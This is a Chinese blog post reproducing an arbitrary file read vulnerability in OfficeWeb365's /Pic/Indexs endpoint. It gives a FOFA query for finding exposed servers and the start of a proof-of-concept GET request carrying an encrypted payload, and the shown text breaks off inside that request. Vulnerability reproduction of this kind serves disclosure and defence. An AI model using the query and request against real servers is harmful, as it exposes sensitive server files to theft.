OfficeWeb365 Indexs 任意文件读取漏洞复现

0xSecl

已于 2024-01-04 15:39:30 修改

阅读量2.2k

点赞数 14

CC 4.0 BY-SA版权

分类专栏：漏洞复现v1 文章标签： web3 web安全

于 2023-12-29 00:27:41 首次发布

本文链接：https://blog.youkuaiyun.com/qq_41904294/article/details/135280791

997 篇文章 ¥9.90 ¥99.00

订阅专栏

本文介绍了OfficeWeb365的任意文件读取漏洞，详细阐述了漏洞概述、复现环境及过程，并提供了PoC和修复建议。攻击者能够通过加密payload读取服务器敏感信息，而修复方案包括限制接口访问权限和更新到安全版本。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务，包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览，WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。

OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特的加密方式对payload进行加密，读取任意文件，获取服务器敏感信息，使系统处于极不安全的状态。

FOFA：body="请输入furl参数" || header="OfficeWeb365" || banner="OfficeWeb365"

PoC

GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe

了解本专栏